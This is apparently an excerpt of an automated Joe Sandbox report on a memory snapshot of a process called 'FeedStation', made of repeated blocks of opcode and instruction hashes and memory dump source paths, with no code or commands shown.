                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: a57dca3daabab9e98624b4578d56db468b3e374940de5d0b533c2c4f2f649ffb
                                                                                                                                                                                                                            • Instruction ID: 675705dfaaff6d84373e1e7439f28448d658ac49add9468266fd3fcbd68ddbf9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a57dca3daabab9e98624b4578d56db468b3e374940de5d0b533c2c4f2f649ffb
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5711E034A483418BD360CF18C880B6BB3A1F7C2314F19953DE5C567261C771D885CB9A
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: d92467acc298b106e0d6ab9f6aa38f72c2bb51ea0b93fcdda126d8c4b65f05dc
                                                                                                                                                                                                                            • Instruction ID: 030e4fb4e5ec88abee11b74bca9a1d494d34e5ede3dce47e2e7bc57dd55818fa
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d92467acc298b106e0d6ab9f6aa38f72c2bb51ea0b93fcdda126d8c4b65f05dc
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 581104B4B451026FE3589B288D01B3AA267A7D2700F36D53DE281AB7D5EF70D8418A09
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 4e64317625e06953a0030493f718403388be9115d8c6a0e5777c3d8d6dbedd3d
                                                                                                                                                                                                                            • Instruction ID: e9122d0c0744b0ea8cb6488fec00e448aaf448dd665b2ae660f38c5ea160a480
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4e64317625e06953a0030493f718403388be9115d8c6a0e5777c3d8d6dbedd3d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5A316274E00119DFDB08CF98C590AAEBBB1FF48315F248559D81AAB345D335AA82CB94
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 61fb783035dfe397bed0587157ecea6118c63087013607c12a243bdb8be7f5f9
                                                                                                                                                                                                                            • Instruction ID: 87fa28a509fac08fc1160ba87c83b2041fa18ec37fed5147c375a6a5bb46af7c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 61fb783035dfe397bed0587157ecea6118c63087013607c12a243bdb8be7f5f9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2101F575A101118BFF34CF58DCA29BFB322FB55228B55863CC91257251DB35E916CB8C
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                            • Instruction ID: 4bc18874bde238a1780b7546ff7045781423eb187c6adf655de34068c6d78f9c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D811E933A051D40ED3168D3C8440575BFA31AD3639F599399F4B89B2D2C6238D8AC378
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: cdd80f3abcf802734e81028c070e806ed95269a3a6cfa6fc66826b029dfd3c6a
                                                                                                                                                                                                                            • Instruction ID: 7f23212b9dae8c1291c18bd314508e2adf71771b0201308af242376ec114ca0d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cdd80f3abcf802734e81028c070e806ed95269a3a6cfa6fc66826b029dfd3c6a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F00184F170034147EB20EE65C8C0B27B6EA7F91704F19443CEA5557280EB75EC058BA9
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 67c80c0d901ee6460d89e9790744841cb8839dbfd38e993d3001ee0e12080132
                                                                                                                                                                                                                            • Instruction ID: 410a8a44366e42de868f29503af23c19718f8f7fda1f00b2e379c60fb2f0d872
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 67c80c0d901ee6460d89e9790744841cb8839dbfd38e993d3001ee0e12080132
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6011E536705600DBC718CF24CCA193FB7A3BBC6214F5A963CD19623260E731E8018F99
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 18d82645edc03947ff54298a386254faed4c1d40806770f25fe444f2b566c533
                                                                                                                                                                                                                            • Instruction ID: 5b3249fbde4a8817c419542d4a176e07d0b06a83ea3068dbbed0b725112452de
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 18d82645edc03947ff54298a386254faed4c1d40806770f25fe444f2b566c533
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E801DAF4C41208BFCB90EFA9DD43A9EBE79EB4A250F14412AF444A7245D331491A8FE7
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 2cf7fde9b1a1620b7684a0eeb54d29f83c9e382eaca1b256dd6760459bbd6f2f
                                                                                                                                                                                                                            • Instruction ID: 4b375dc95f47ed8430550b22e53bed9e317e5dd06db61c7fdfd737d0b918c2e7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2cf7fde9b1a1620b7684a0eeb54d29f83c9e382eaca1b256dd6760459bbd6f2f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BDF0F632C152A08FC708DB28CC70A6B7BB9AAC6604F15862CE8C6D7641D7359915CEDC
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
                                                                                                                                                                                                                            • Instruction ID: 40a5f10f990bfbd46b6fd5aaf59204bf16b4a5f2a64eb1421868b38a8215e270
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9601FB34A41108EFDF15DF94C594AADF7B2FB48311F20829AD80A5B785C330AF41DB50
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: b39ba5dedc6d2c5ccd99419d898c12ca8398477d6c2e0ae2ec3b75e706bb8d37
                                                                                                                                                                                                                            • Instruction ID: ce74e8f6f99b38fb659f68a66e4a7c74abf6140a027235958b8357afd0741246
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b39ba5dedc6d2c5ccd99419d898c12ca8398477d6c2e0ae2ec3b75e706bb8d37
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8E09239C4922A8ADB20DE0084D02F6F270FB02758FC81429DCC627180E7749A85D24D
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 5cd66204bbe693966c2e87fd7893884149b89ecf7d2efade1afa97aeac904fa7
                                                                                                                                                                                                                            • Instruction ID: c99d48f6a12eb4efb9c0d5e81e85304776c0f5e439bbb2ec701720f7a1c445d2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5cd66204bbe693966c2e87fd7893884149b89ecf7d2efade1afa97aeac904fa7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DAF06D78804701DFDB118F65EC44916BBB6FF86301B108925FC5697230C731E842CF18
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: a4723405d480c527835cd09d5f1a1d2fc7f8dd7596131a7e20133ef63a8b6e26
                                                                                                                                                                                                                            • Instruction ID: d2dbdfa0efb212cc58587adcd9fb7111b4cb3b22aa5ad99f6b68895c0e013d0b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a4723405d480c527835cd09d5f1a1d2fc7f8dd7596131a7e20133ef63a8b6e26
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5BD05E40A0CA83C74B094EDD18E1331EB677B1F20571854B9A8E1AB4C3C786E456851C
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 4d0d2d9e848a1add9e813e5a922b71bc853dc7972e9a113f041cb24f8786120f
                                                                                                                                                                                                                            • Instruction ID: 4982bb21cc84cabf780aae93a071ff52b577ba96d7ef4ccda927ba07f343daaf
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4d0d2d9e848a1add9e813e5a922b71bc853dc7972e9a113f041cb24f8786120f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D5E012B8904B02DFD711CF69E884A16BBB6FF9A301F108925E85A97320D730E842CF19
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 1af40a913f7c47b13a0f5b19677460d3fc6a6bc076506e07f04f546dca7c6ac2
                                                                                                                                                                                                                            • Instruction ID: 6bb70803dda8588c8c52cc7a4c7d4147d2e0bef7d1b8590259a495aea4bcf373
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1af40a913f7c47b13a0f5b19677460d3fc6a6bc076506e07f04f546dca7c6ac2
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35E09A78914700DFDB258F25D844826BBB9FB863067109865FC5757660C731E842DF58
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 29598aafd6c10ec109047cb5288dd48ab5ea7344158e945e5663cd9dc2fc3f0b
                                                                                                                                                                                                                            • Instruction ID: 6dda496533fdb9c77428ae668cd7c027fa5a0983bf08e06cc6708a73fff7f641
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 29598aafd6c10ec109047cb5288dd48ab5ea7344158e945e5663cd9dc2fc3f0b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56D017B9B86200AFD7068F15DD42655B762FBCA210B49D038E808D3324DA38D801CB0A
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 6d0e580c484e81291c750123e15489df83d03ba1a02b2079b528a7238087ebd9
                                                                                                                                                                                                                            • Instruction ID: 8dbcb78827ba80f1c7299fa9b841523be9ef42ad76a00d8f245bd284fc3a5af3
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6d0e580c484e81291c750123e15489df83d03ba1a02b2079b528a7238087ebd9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD900264D481418A9100EF049440470E2F8620B502F103450B008F3012C311D508450C